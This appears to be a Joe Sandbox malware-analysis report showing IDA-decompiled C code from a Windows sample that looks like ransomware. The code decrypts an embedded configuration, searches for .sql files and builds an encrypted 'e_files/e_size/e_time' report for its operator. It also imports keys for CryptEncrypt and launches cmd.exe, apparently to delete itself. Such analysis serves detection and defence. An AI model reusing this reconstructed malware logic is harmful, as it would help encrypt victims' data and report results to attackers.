Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: AcquireAllocContextCryptVirtual$ErrorLast
String ID:
API String ID: 3824161113-0
Opcode ID: f497ffd91905dbfabb09833d428e6ecb82607aba21d6ec82d0ee64889756009d
Instruction ID: 2a9a3b098361438b00d7a8dceb517dfd63e39cf7f749df0161de1cd59aef210a
Opcode Fuzzy Hash: f497ffd91905dbfabb09833d428e6ecb82607aba21d6ec82d0ee64889756009d
Instruction Fuzzy Hash: 7111C974A40208EFE704CF94DA55F9AB7F5EF88709F208198E904AB392D7B5AF009B54

Uniqueness

Uniqueness Score: -1.00%

Function 00404AF0 Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t2;

				E004048A0(_t2); // executed
				ExitProcess(0);
			}

0x00404af3
0x00404afa

APIs

Part of subcall function 004048A0: Sleep.KERNEL32(000003E8), ref: 004048AB
Part of subcall function 004048A0: ExitProcess.KERNEL32 ref: 004048BC

ExitProcess.KERNEL32 ref: 00404AFA

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: ExitProcess$Sleep
String ID:
API String ID: 1320946285-0
Opcode ID: 1f204cbbbf4b91cb41731de12bafb510547bb58fbcebeb620ebc01891cafb445
Instruction ID: 1b19d15e4aeeb9909d6bd86e0db19be6c339a400cc2da824b43fea8bc324f338
Opcode Fuzzy Hash: 1f204cbbbf4b91cb41731de12bafb510547bb58fbcebeb620ebc01891cafb445
Instruction Fuzzy Hash: 56A011302082080AE0803BA2A80AB0A320C0B00A02F800030A208A80C208A8280080AE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405050 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 191
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00405050(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				CHAR* _v12;
				int _v16;
				char _v18;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				void* _v36;
				CHAR** _v40;
				void* _v44;
				char _v299;
				char _v300;
				void* _v356;
				void* _v360;
				int _t55;
				int _t56;
				BYTE* _t57;
				int _t59;
				void* _t63;
				void* _t64;
				char _t65;
				void* _t77;
				signed int _t79;
				signed int _t81;
				int _t82;
				int _t85;
				char _t87;
				CHAR* _t95;
				int _t97;
				char* _t98;
				void* _t107;
				void* _t108;
				signed char _t109;
				short* _t111;
				WCHAR* _t116;
				CHAR* _t117;
				BYTE* _t124;
				WCHAR* _t125;
				WCHAR* _t126;
				void* _t127;
				long _t128;
				char* _t129;
				int _t130;
				void* _t131;
				CHAR* _t132;
				void* _t133;
				long _t134;
				char* _t135;

				_v40 = __edx;
				_v12 = __ecx;
				_t55 = lstrlenA(__ecx);
				_t107 = VirtualAlloc;
				_t56 = _t55 + 1;
				_v16 = _t56;
				_t4 = _t56 + 1; // 0x2
				_t128 = _t4;
				_t57 = VirtualAlloc(0, _t128, 0x3000, 0x40);
				_v44 = _t57;
				if(_t57 == 0 || _v16 >= _t128) {
					_t124 = 0;
					__eflags = 0;
				} else {
					_t124 = _t57;
				}
				_t129 = 0;
				_t59 = CryptStringToBinaryA(_v12, 0, 1, _t124,  &_v16, 0, 0);
				_t144 = _t59;
				if(_t59 == 0) {
					GetLastError();
					goto L26;
				} else {
					_t63 = "#shasj"; // 0x61687323
					asm("movq xmm0, [0x410128]");
					_t130 = _v16;
					_v24 = _t63;
					_t64 =  *0x410134; // 0x6a73
					_v20 = _t64;
					_t65 =  *0x410136; // 0x0
					_v18 = _t65;
					asm("movq [ebp-0x1c], xmm0");
					_v300 = 0;
					E00408B30( &_v299, 0, 0xff);
					E00405C40( &_v300,  &_v32, lstrlenA( &_v32));
					E00405CF0( &_v300, _t124, _t130);
					_t116 =  &_v32;
					asm("xorps xmm0, xmm0");
					asm("movdqu [ebp-0x1c], xmm0");
					E004033E0(_t116, _t144, _t124);
					if(_v32 != 0) {
						E00404FD0();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t107);
						_push(_t130);
						_push(_t124);
						_t125 = _t116;
						_t131 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
						_v360 = _t131;
						GetModuleFileNameW(0, _t131, 0x200);
						_t108 = CreateFileW(_t131, 0x80000000, 1, 0, 3, 0x80, 0);
						_v356 = _t108;
						__eflags = _t108 - 0xffffffff;
						if(_t108 != 0xffffffff) {
							_t77 = CreateFileMappingW(_t108, 0, 8, 0, 0, 0);
							_v28 = _t77;
							__eflags = _t77;
							if(_t77 != 0) {
								_t79 = MapViewOfFile(_t77, 1, 0, 0, 0);
								_v16 = _t79;
								__eflags = _t79;
								if(_t79 != 0) {
									_t41 = _t79 + 0x4e; // 0x4e
									_t132 = _t41;
									_v12 = _t132;
									_t81 = lstrlenW(_t125);
									_t109 = 0;
									_t126 =  &(_t125[_t81]);
									_t82 = lstrlenA(_t132);
									__eflags = _t82 + _t82;
									if(_t82 + _t82 != 0) {
										_t117 = _t132;
										do {
											__eflags = _t109 & 0x00000001;
											if((_t109 & 0x00000001) != 0) {
												 *((char*)(_t126 + _t109)) = 0;
											} else {
												_t87 =  *_t132;
												_t132 =  &(_t132[1]);
												 *((char*)(_t126 + _t109)) = _t87;
											}
											_t109 = _t109 + 1;
											_t85 = lstrlenA(_t117);
											_t117 = _v12;
											__eflags = _t109 - _t85 + _t85;
										} while (_t109 < _t85 + _t85);
									}
									UnmapViewOfFile(_v16);
									_t108 = _v20;
									_t131 = _v24;
								}
								CloseHandle(_v28);
							}
							CloseHandle(_t108);
						}
						return VirtualFree(_t131, 0, 0x8000);
					} else {
						_t127 = _v28;
						_v12 = 1;
						if(_t127 != 0) {
							_t97 = lstrlenA(_t127);
							_v8 = _t97;
							_t24 = _t97 + 1; // 0x1
							_t134 = _t24;
							_t98 = VirtualAlloc(0, _t134, 0x3000, 0x40);
							_v36 = _t98;
							if(_t98 == 0 || _v8 >= _t134) {
								_t135 = 0;
								__eflags = 0;
							} else {
								_t135 = _t98;
							}
							if(CryptStringToBinaryA(_t127, 0, 1, _t135,  &_v8, 0, 0) != 0) {
								_t111 = VirtualAlloc(0, 2 + _v8 * 2, 0x3000, 4);
								if(_t111 != 0) {
									if(MultiByteToWideChar(0xfde9, 0, _t135, 0xffffffff, _t111, _v8 + 1) <= 0) {
										GetLastError();
									} else {
										 *0x412b00 = _t111;
									}
								}
							}
							VirtualFree(_v36, 0, 0x8000);
						}
						_t33 =  &_v24; // 0x4054e4
						_t133 =  *_t33;
						if(_t133 != 0) {
							_t95 = VirtualAlloc(0, lstrlenA(_t133) + 1, 0x3000, 4);
							 *_v40 = _t95;
							if(_t95 != 0) {
								lstrcpyA(_t95, _t133);
							}
						}
						_t88 = GetProcessHeap;
						if(_t127 != 0) {
							HeapFree(GetProcessHeap(), 0, _t127);
							_t88 = GetProcessHeap;
						}
						if(_t133 != 0) {
							HeapFree( *_t88(), 0, _t133);
						}
						_t129 = _v12;
						L26:
						VirtualFree(_v44, 0, 0x8000);
						return _t129;
					}
				}
			}

0x0040505d
0x00405062
0x00405065
0x0040506b
0x00405071
0x00405079
0x0040507c
0x0040507c
0x00405082
0x00405084
0x00405089
0x00405094
0x00405094
0x00405090
0x00405090
0x00405090
0x00405096
0x004050a5
0x004050ab
0x004050ad
0x0040525e
0x00000000
0x004050b3
0x004050b3
0x004050b8
0x004050c0
0x004050c3
0x004050c6
0x004050cc
0x004050d0
0x004050da
0x004050e6
0x004050eb
0x004050f2
0x0040510e
0x0040511c
0x00405124
0x00405127
0x0040512a
0x00405130
0x00405139
0x00405266
0x0040526b
0x0040526c
0x0040526d
0x0040526e
0x0040526f
0x00405276
0x00405277
0x00405278
0x00405287
0x0040528f
0x00405299
0x0040529c
0x004052bb
0x004052bd
0x004052c0
0x004052c3
0x004052d4
0x004052da
0x004052dd
0x004052df
0x004052ea
0x004052f0
0x004052f3
0x004052f5
0x004052f7
0x004052f7
0x004052fb
0x004052fe
0x00405305
0x00405307
0x0040530a
0x00405310
0x00405312
0x00405314
0x00405316
0x00405316
0x00405319
0x00405323
0x0040531b
0x0040531b
0x0040531d
0x0040531e
0x0040531e
0x00405328
0x00405329
0x0040532f
0x00405334
0x00405334
0x00405316
0x0040533b
0x00405341
0x00405344
0x00405344
0x0040534a
0x0040534a
0x00405351
0x00405351
0x0040536b
0x0040513f
0x0040513f
0x00405142
0x0040514b
0x00405152
0x0040515f
0x00405162
0x00405162
0x00405168
0x0040516a
0x0040516f
0x0040517a
0x0040517a
0x00405176
0x00405176
0x00405176
0x00405192
0x004051aa
0x004051ae
0x004051c8
0x004051d2
0x004051ca
0x004051ca
0x004051ca
0x004051c8
0x004051d8
0x004051e8
0x004051e8
0x004051ee
0x004051ee
0x004051f3
0x00405207
0x0040520c
0x00405210
0x00405214
0x00405214
0x00405210
0x00405220
0x00405227
0x0040522f
0x00405231
0x00405231
0x00405238
0x00405240
0x00405240
0x00405242
0x00405245
0x0040524f
0x0040525d
0x0040525d
0x00405139

APIs

lstrlenA.KERNEL32(?,00000001,?,?), ref: 00405065
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00405082
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004050A5
_memset.LIBCMT ref: 004050F2
lstrlenA.KERNEL32(?), ref: 004050FE
lstrlenA.KERNEL32(?,00000000), ref: 00405152
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00405168
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0040518A
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004051A8
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000001), ref: 004051C0
GetLastError.KERNEL32 ref: 004051D2
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004051E8
lstrlenA.KERNEL32(T@,00003000,00000004,00000000), ref: 004051FD
VirtualAlloc.KERNEL32(00000000,00000001), ref: 00405207
lstrcpyA.KERNEL32(00000000,T@), ref: 00405214
HeapFree.KERNEL32(00000000), ref: 0040522F
HeapFree.KERNEL32(00000000), ref: 00405240
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040524F
GetLastError.KERNEL32 ref: 0040525E

Part of subcall function 00404FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,0040526B,00000000), ref: 00404FE6
Part of subcall function 00404FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00404FF8
Part of subcall function 00404FD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00405008
Part of subcall function 00404FD0: wsprintfW.USER32 ref: 00405019
Part of subcall function 00404FD0: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00405033
Part of subcall function 00404FD0: ExitProcess.KERNEL32 ref: 0040503B

Strings

#shasj, xrefs: 004050B3
T@, xrefs: 004051EE, 004051FC, 00405212, 0040523A

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$Freelstrlen$BinaryCryptErrorHeapLastString$ByteCharExecuteExitFileModuleMultiNameProcessShellWide_memsetlstrcpywsprintf
String ID: #shasj$T@
API String ID: 463976167-3786297935
Opcode ID: 634f5961097015f30c8b0ac83ea798bb248f13a275b99a132a4a8292019a7bca
Instruction ID: a9872d5510dab6a1258aa89b5c1af8b8eb6182ffb0005660de6a3b244a0720a6
Opcode Fuzzy Hash: 634f5961097015f30c8b0ac83ea798bb248f13a275b99a132a4a8292019a7bca
Instruction Fuzzy Hash: 54519471E01215ABEB209BA59D49BAF7BB8EF48710F100065FA05BA2D1DB749D01CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004064A0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064A0(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E00407C10(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E00406440(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

0x004064ab
0x004064af
0x004064be
0x004064c1
0x004064c4
0x004064de
0x004064e3
0x004064e6
0x004064f0
0x00406500
0x00000000
0x0040651c
0x00406524
0x0040652b
0x00406531
0x00406534
0x00406539
0x00406608
0x00406608
0x00000000
0x00406540
0x00406540
0x00406546
0x00406549
0x0040654a
0x00000000
0x00000000
0x00000000
0x0040654a
0x0040654e
0x00000000
0x00406554
0x0040655a
0x0040655e
0x00000000
0x00406564
0x00406577
0x00406582
0x00406586
0x0040658f
0x004065a0
0x004065a4
0x004065b7
0x004065ce
0x004065d4
0x004065de
0x004065de
0x004065e9
0x004065e9
0x004065ef
0x004065ef
0x004065f3
0x004065f9
0x004065fe
0x0040660a
0x0040660f
0x00000000
0x0040660f
0x004065fe
0x0040655e
0x0040654e
0x00406539
0x00000000
0x00406612
0x00406622
0x0040662d
0x0040663b

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 004064B2
lstrcatW.KERNEL32(00000000,00410364), ref: 004064C4
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004064D2
lstrcmpW.KERNEL32(?,00410368,?,?), ref: 004064FC
lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406512
lstrcatW.KERNEL32(00000000,?), ref: 00406524
lstrlenW.KERNEL32(00000000,?,?), ref: 0040652B
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0040655A
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00406571
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0040657C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0040659A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 004065AF
lstrlenA.KERNEL32(*******************,?,?), ref: 004065CE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004065E9
CloseHandle.KERNEL32(00000000,?,?), ref: 004065F3
FindNextFileW.KERNEL32(?,?,?,?), ref: 0040661C
FindClose.KERNEL32(?,?,?), ref: 0040662D

Strings

*******************, xrefs: 004065B9, 004065C9
.sql, xrefs: 00406554

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: 05c8e46b5a6b324242753d00ddfa767ad3d4e90b023ac9ffc8302244919f4615
Instruction ID: d8231c9366fa09183c7f9a28845eb84a492a5b8a9a6307543842452b5fb504c9
Opcode Fuzzy Hash: 05c8e46b5a6b324242753d00ddfa767ad3d4e90b023ac9ffc8302244919f4615
Instruction Fuzzy Hash: 24419271601219ABEB209B609D48FAB77BCEF44704F11447AF902F6191EB799E50CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00405540 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00405540(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				BYTE* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				char _v22;
				short _v24;
				short _v28;
				char _v36;
				char _v180;
				char _v435;
				char _v436;
				WCHAR* _t40;
				signed int _t48;
				int _t60;
				void* _t61;
				char _t68;
				CHAR* _t71;
				void* _t74;
				short _t79;
				short _t80;
				char _t81;
				BYTE* _t84;
				WCHAR* _t92;
				signed int _t93;
				char* _t95;
				void* _t96;
				int _t98;
				long _t99;
				void* _t100;

				_t74 = __ecx;
				_t96 = __edx;
				_v12 = __ecx;
				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v16 = _t40;
				if(_t40 == 0) {
					_t92 = 0;
					_t71 = 0;
				} else {
					_t3 =  &(_t40[0x400]); // 0x800
					_t71 = _t3;
					_t92 = _t40;
				}
				_push(_t96);
				_v8 = _t92;
				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				E004039B0( &_v180);
				E00406D90( &_v180);
				E00406BA0( &_v180);
				E004069A0( &_v180,  &(_t92[lstrlenW(_t92)]));
				_t48 = lstrlenW(_t92);
				_t79 = "#shasj"; // 0x61687323
				_t93 = _t48;
				asm("movq xmm0, [0x410128]");
				_v28 = _t79;
				_t80 =  *0x410134; // 0x6a73
				_v24 = _t80;
				_t81 =  *0x410136; // 0x0
				asm("movq [ebp-0x20], xmm0");
				_v22 = _t81;
				_v436 = 0;
				E00408B30( &_v435, 0, 0xff);
				E00405C40( &_v436,  &_v36, lstrlenA( &_v36));
				_t98 = _t93 + _t93;
				E00405CF0( &_v436, _v8, _t98);
				_v20 = _t93 * 8;
				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
					GetLastError();
				}
				_t29 = lstrlenA(_t71) + 4; // 0x4
				_t99 = _t29;
				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
				_t60 = lstrlenA(_t71);
				_t84 = _v12;
				_t61 = _t60 + 2;
				if(_t84 == 0) {
					L7:
					_v8 = 0;
				} else {
					_v8 = _t84;
					if(_t61 >= _t99) {
						goto L7;
					}
				}
				_t100 = 0;
				if(lstrlenA(_t71) != 0) {
					_t95 = _v8;
					do {
						_t68 =  *((intOrPtr*)(_t100 + _t71));
						if(_t68 != 0xa && _t68 != 0xd) {
							 *_t95 = _t68;
							_t95 = _t95 + 1;
						}
						_t100 = _t100 + 1;
					} while (_t100 < lstrlenA(_t71));
				}
				E00405370(_v8, 0, 0);
				_t73 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E00407720( &_v180);
				VirtualFree(_v16, 0, 0x8000);
				_t67 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

0x00405540
0x0040555a
0x0040555c
0x0040555f
0x00405565
0x0040556a
0x00405576
0x00405578
0x0040556c
0x0040556c
0x0040556c
0x00405572
0x00405572
0x0040557a
0x0040557e
0x0040558d
0x00405596
0x00405598
0x00405599
0x0040559e
0x004055a0
0x004055a1
0x004055a3
0x004055a4
0x004055a6
0x004055a7
0x004055a9
0x004055aa
0x004055af
0x004055b1
0x004055b2
0x004055ba
0x004055c5
0x004055d0
0x004055e8
0x004055ee
0x004055f0
0x004055f6
0x004055f8
0x00405606
0x00405609
0x00405615
0x00405619
0x00405622
0x00405627
0x0040562a
0x00405631
0x0040564d
0x00405655
0x00405662
0x00405671
0x0040568a
0x0040568c
0x0040568c
0x004056a2
0x004056a2
0x004056af
0x004056b2
0x004056b4
0x004056b7
0x004056bc
0x004056c5
0x004056c5
0x004056be
0x004056be
0x004056c3
0x00000000
0x00000000
0x004056c3
0x004056cd
0x004056d3
0x004056d5
0x004056d8
0x004056d8
0x004056dd
0x004056e3
0x004056e5
0x004056e5
0x004056e7
0x004056ee
0x004056d8
0x004056f9
0x00405713
0x00405720
0x00405728
0x00405737
0x0040573b
0x00405741

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0040555F
wsprintfW.USER32 ref: 0040558D
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 004055DC
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 004055EE
_memset.LIBCMT ref: 00405631
lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0040563D
CryptBinaryToStringA.CRYPT32(?,74CB69A0,40000001,00000000,00000000), ref: 00405682
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 0040568C
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 00405699
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 004056A8
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056B2
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056CF
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056E8
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00405720
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00405737

Strings

action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 00405587
#shasj, xrefs: 004055F0

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
API String ID: 2994799111-4131875188
Opcode ID: 51a0efbfb0500c96f4d42aacda74baac6df24cd220e5eca8f45d8e73b1e17734
Instruction ID: 65ff7d96991e722c176764c3897e6b24fa244fe7beac740f882282c65e832afb
Opcode Fuzzy Hash: 51a0efbfb0500c96f4d42aacda74baac6df24cd220e5eca8f45d8e73b1e17734
Instruction Fuzzy Hash: B4519F71A00219AAEB20AB65DD46FEF7B79EF44704F100079E605B62D1DB746E04CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406000 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 89
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00406000(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, char _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0x412ae8);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						_t12 =  &_v28; // 0x403724
						__imp__CryptGetKeyParam(_v12, 8, _t12, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t16 =  &_a20; // 0x403724
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16,  *_t16);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E004034F0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0x412ae8);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

0x0040600b
0x00406011
0x00406018
0x0040602a
0x0040602e
0x00406036
0x0040606e
0x0040606e
0x00406091
0x00406093
0x0040609c
0x004060a0
0x004060aa
0x004060b0
0x004060b6
0x004060bc
0x004060c4
0x004060d2
0x004060d8
0x004060e1
0x004060e8
0x004060ed
0x004060ed
0x004060e8
0x004060f8
0x00406103
0x00000000
0x00406109
0x00406038
0x00406043
0x00000000
0x00406067
0x00406054
0x0040605c
0x00000000
0x00406065
0x00000000

APIs

EnterCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000,00000000,?,00000800), ref: 0040600B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00403724,00000000,00000000,00000000), ref: 0040602E
GetLastError.KERNEL32(?,00403724,00000000,00000000,00000000), ref: 00406038
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00403724,00000000,00000000,00000000), ref: 00406054
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00403724,00000000,00000000), ref: 00406089
CryptGetKeyParam.ADVAPI32(00000000,00000008,$7@,0000000A,00000000,?,00403724,00000000), ref: 004060AA
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,$7@,?,00403724,00000000), ref: 004060D2
GetLastError.KERNEL32(?,00403724,00000000), ref: 004060DB
CryptReleaseContext.ADVAPI32(00000000,00000000,?,00403724,00000000,00000000), ref: 004060F8
LeaveCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000), ref: 00406103

Strings

$7@, xrefs: 004060A0, 004060A3
$7@, xrefs: 004060BC, 004060BF
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00406023, 00406049

